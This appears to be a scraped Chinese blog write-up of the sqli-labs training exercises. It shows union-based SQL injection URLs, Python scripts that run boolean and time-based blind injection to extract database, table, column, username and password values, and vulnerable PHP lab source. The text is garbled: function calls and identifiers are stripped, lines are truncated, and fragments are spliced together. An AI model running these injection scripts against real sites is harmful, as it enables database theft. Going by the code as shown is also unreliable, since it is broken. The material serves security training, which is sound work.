2023年12月15日发(作者:)

less-3:单引号+括号闭合Less-3 Error Based- String (with Twist)

Welcome    Dhakkan

"; echo 'Your Login name:'. $row['username']; echo "

"; echo 'Your Password:' .$row['password']; echo ""; } else { echo ''; print_r(mysql_error()); echo ""; }} else { echo "Please input the ID as parameter with numeric value";}>




源码数据库:security192.168.40.165/sqli-labs-master/Less-3/id=--1') union select 1,2,database() %23

数据表:emails,referers,uagents,users192.168.40.165/sqli-labs-master/Less-3/id=--1') union select 1,2,group_concat(table_name) from information_s where table_schema=database() %23列名:user_id,first_name,last_name,user,password,avatar,id,username,password192.168.40.165/sqli-labs-master/Less-3/id=--1') union select 1,2,group_concat(column_name) from information_s where table_name='users' %23

字段值:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4192.168.40.165/sqli-labs-master/Less-3/id=--1') union select 1,2,group_concat(username) from users %23

global tag i = 0 while i < 1000: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((select group_concat("+colums+") from "+table+"))="+str(i) + "--+" response = (urls).text htmlelmet = (response).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i else: i += 1def data_datail(length,colums,table): ''' 得到数据表中的值 :param length: 值得长度 :param colums: 查询的字段名 :param table: 查询的表名 :return: 字段值 ''' global d data = "" for j in range(1,length+1): for i in range(32,128): urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substring((select group_concat("+colums+") from "+table+"),"+str(j)+",1))="+str(i)+"--+" response = (urls).text htmlelmet = (response).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: data += chr(i) print(colums,'字段值=',data) break # print(data)if __name__ == '__main__': # print(table_length()) # print(table_name(90)) # print(colums_length('users')) # print(column_name(70,'users')) # print(data_length('password','users')) print(data_datail(96,'password','users'))正确版

Less-9:时间盲注+单引号闭合单引号+时间盲注:id=1' and sleep(3)--+ 1 ''' 2 @Modify Time @Author

3 ------------ -------

4 2019/10/2 20:04 laoalo

5 ''' 6 # -*- coding:utf-8 -*- 7 import requests 8 import time 9

10 url = "192.168.40.165/sqli-labs-master/Less-9/?id=1'" 11 def database_length(): 12 global url 13 for i in range(1,10000): 14 sql = url + " and if((select length(database()))>"+str(i)+",0,sleep(3)) +--+" 15 s_time = () 16 response = (url=sql,timeout=3) 17 e_time = () 18 print(sql) 19 if(e_time-s_time) > 3: 20 print("数据库长:",i) 21 break 22 def database_name(database_length): 23 global url 24 sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+" 25 db_name = '' 26 for num in range(1, database_length+1): 27 for asc in range(ord('a'), ord('z') + 1): 28 s_time = () 29 ((num=num, asc=asc)) 30 e_time = () 31 if (e_time - s_time) > 3: 32 db_name += chr(asc) 33 print("数据库名:",db_name) 34 break 35 def table_length(database_name): 36 global url 37 for i in range(1, 10000): 38 sql = url + " and if((select length((select group_concat(table_name) from information_ where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(3)) +--+" 39 s_time = () 40 response = (url=sql, timeout=3) 41 e_time = () 42 print(sql)

43 if (e_time - s_time) > 3: 44 print(database_name,"中的所有数据表名长:", i) 45 break 46 def table_name(table_length,database_name): 47 global url 48 sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_ where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(3)) +--+" 49 table_name = '' 50 for num in range(1, table_length + 1): 51 for asc in range(32, 128): 52 s_time = () 53 ((num=num, asc=asc)) 54 e_time = () 55 if (e_time - s_time) > 3: 56 table_name += chr(asc) 57 print("所有的数据表名:", table_name) 58 break 59 def column_length(table_name,database_name): 60 global url 61 for i in range(1, 10000): 62 sql = url + " and if((select length((select group_concat(column_name) from information_s where table_name='" + table_name + "' and table_schema='"+database_name+"')))> 63 s_time = () 64 (url=sql, timeout=3) 65 e_time = () 66 # print(sql) 67 if (e_time - s_time) > 3: 68 print(table_name, "中的所有字段名长:", i) 69 break 70 def column_name(column_length,table_name,database_name): 71 global url 72 sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_s where table_name='" + table_name + "' and table_schema='"+database_name+ 73 table_name = '' 74 for num in range(1, column_length + 1): 75 for asc in range(32, 128): 76 s_time = () 77 ((num=num, asc=asc)) 78 e_time = () 79 if (e_time - s_time) > 3: 80 table_name += chr(asc) 81 print("所有的数据表名:", table_name) 82 break 83 def data_length(column_name,table_name): 84 global url 85 for i in range(1, 10000): 86 sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+" 87 s_time = () 88 (url=sql, timeout=3) 89 e_time = () 90 # print(sql) 91 if (e_time - s_time) > 3: 92 print(column_name, "字段的值长:", i) 93 break 94 def data_detail(data_length,column_name,table_name): 95 global url 96 sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+" 97 data = '' 98 for num in range(1, data_length + 1): 99 for asc in range(32, 128):100 s_time = ()101 ((num=num, asc=asc))102 e_time = ()103 if (e_time - s_time) > 3:104 data += chr(asc)105 print(column_name,"字段的值:", data)106 break107 if __name__ == '__main__':108 # database_length() # 8109 # database_name(8) #security110 # table_length('security')#security 中的所有数据表名长: 29111 # table_name(29, 'security')#所有的数据表名: emails@referers@uagents@users112 # column_length('users','security') #20113 # column_name(20,'users','security')#所有的数据表名: id@username@password114 # data_length('username', 'users')#91115 data_detail(91, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4脚本 Less-10:时间盲注+双引号闭合双引号+时间盲注id=1" and sleep(3)--+ 1 ''' 2 @Modify Time @Author

3 ------------ -------

4 2019/10/2 16:56 laoalo 5 ''' 6 # -*- coding:utf-8 -*- 7 import requests 8 import time 9

10 url = '192.168.40.165/sqli-labs-master/Less-10/?id=1"' 11 def database_length(): 12 global url 13 for i in range(1,10000): 14 sql = url + " and if((select length(database()))>"+str(i)+",0,sleep(3)) +--+" 15 s_time = () 16 response = (url=sql,timeout=3) 17 e_time = () 18 print(sql)

12 url = "192.168.199.190/sqli-labs-master/Less-15/" 13

14

15 def database_length(): 16 global url 17 for i in range(1,10000): 18 s_time = () 19 data = { 20 'uname' : "admin' and if ( length(database()) < %d , sleep(3) , 1)#" % (i), 21 'passwd': 'admin', 22 # 'submit': 'Submit' 23 } 24 print(data['uname']) 25 (url=url, data=data) 26 e_time = () 27 if (e_time - s_time).seconds > 2: 28 print("tttt数据库长:", i-1) 29 break 30 def database_name(length): 31 global url 32 name="" 33 for j in range(1,length+1): 34 for i in range(32, 128): 35 s_time = () 36 data = { 37 'uname': "admin' and if (ascii (substr(database(), %d, 1))=%d, sleep(3), 1)#" % ( j , i), 38 'passwd': 'admin', 39 # 'submit': 'Submit' 40 } 41 re=(url=url, data=data) 42 e_time = () 43 print(data['uname']) 44 # print("tttt数据库名:", chr(i)) 45 if (e_time - s_time) > 2: 46 name += chr(i) 47 print("tttt数据库名:", name) 48 break 49 def table_length(): 50 global url 51 for i in range(1, 10000): 52 s_time = () 53 data = { 54 'uname': "admin' and if ( length((select group_concat(table_name) from information_ where table_schema=database())) < %d , sleep(3) , 1)#" % (i), 55 'passwd': 'admin', 56 # 'submit': 'Submit' 57 } 58 print(data['uname']) 59 (url=url, data=data) 60 e_time = () 61 if (e_time - s_time).seconds > 2: 62 print("tttt所有的数据表长:", i - 1) 63 break 64 def table_name(table_length): 65 global url 66 char = "abcdefghijklmnopqrstuvwxyz_" 67 print("start!") 68 tablename = "" 69 for i in range(0, table_length+1): 70 print("n第 %d 张表的爆破" %(i+1)) 71 for j in range(0, 20): 72 for str in char: 73 # print(str) 74 time1 = () 75 data = { 76 'uname': "admin'and If((mid((select table_name from information_ where table_schema=database() limit %d,1),%d,1))='%s',1,sleep(2))#" % (i, j, str), 77 'passwd': "1"} 78 res = (url, data=data) 79 print(data['uname']) 80 time2 = () 81 sec = (time2 - time1).seconds 82 if sec < 1: 83 tablename += str 84 print("表名:",tablename) 85 break 86

87 print("tttt表名:",tablename) 88 def colums_length(table_name): 89 global url 90 for i in range(1,10000): 91 s_time = () 92 data = { 93 'uname' : "admin' and if ( length((select group_concat(column_name) from information_s where table_name='"+table_name+"' and table_schema=database())) < %d , sleep(3) , 1)# 94 'passwd': 'admin', 95 # 'submit': 'Submit' 96 } 97 print(data['uname']) 98 (url=url, data=data) 99 e_time = ()100 if (e_time - s_time).seconds > 2:101 print("tttt字段长:", i-1)102 break103 def column_name(length,table_name):104 global url105 column_name = ""106 for j in range(1, length + 1):107 for i in range(32, 128):108 s_time = ()109 data = {110 'uname': "admin' and if (ascii (substr((select group_concat(column_name) from information_s where table_name='"+table_name+"' and table_schema=database()), %d, 1))=%d, sleep(3), 1)#111 'passwd': 'admin',112 # 'submit': 'Submit'113 }114 re = (url=url, data=data)115 e_time = ()

1

6 function check_input($value) 7 { 8 if(!empty($value)) 9 {10 // truncation (see comments)11 $value = substr($value,0,20);12 }13

14 // Stripslashes if magic quotes enabled15 if (get_magic_quotes_gpc())16 {17 $value = stripslashes($value);18 }19

20 // Quote if not a number21 if (!ctype_digit($value))22 {23 $value = "'" . mysql_real_escape_string($value) . "'";24 }25 else26 {27 $value = intval($value);28 }29

30 return $value;31 }32

33 $uagent = $_SERVER['HTTP_USER_AGENT'];34 $IP = $_SERVER['REMOTE_ADDR'];35 echo "

";36 echo 'Your IP ADDRESS is: ' .$IP;37 echo "

";38 //echo 'Your User Agent is: ' .$uagent;39 // take the variables40

41

42 if(isset($_POST['uname']) && isset($_POST['passwd']))43 {44

45 $uname = check_input($_POST['uname']);46 $passwd = check_input($_POST['passwd']);47

48

49 //logging the connection parameters to a file for analysis.50 $fp=fopen('','a');51 fwrite($fp,'User Agent:'.$uname."n");52

53 fclose($fp);54

55

56

57 $sql="SELECT me, rd FROM users WHERE me=$uname and rd=$passwd ORDER BY DESC LIMIT 0,1";58 $result1 = mysql_query($sql);59 $row1 = mysql_fetch_array($result1);60 if($row1)61 {62 echo '';63 $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";64 mysql_query($insert);65 //echo 'Your IP ADDRESS is: ' .$IP;66 echo "";67 //echo "

";68 echo '';69 echo 'Your User Agent is: ' .$uagent;70 echo "";71 echo "

";72 print_r(mysql_error());73 echo "

";74 echo '';75 echo "

";76

77 }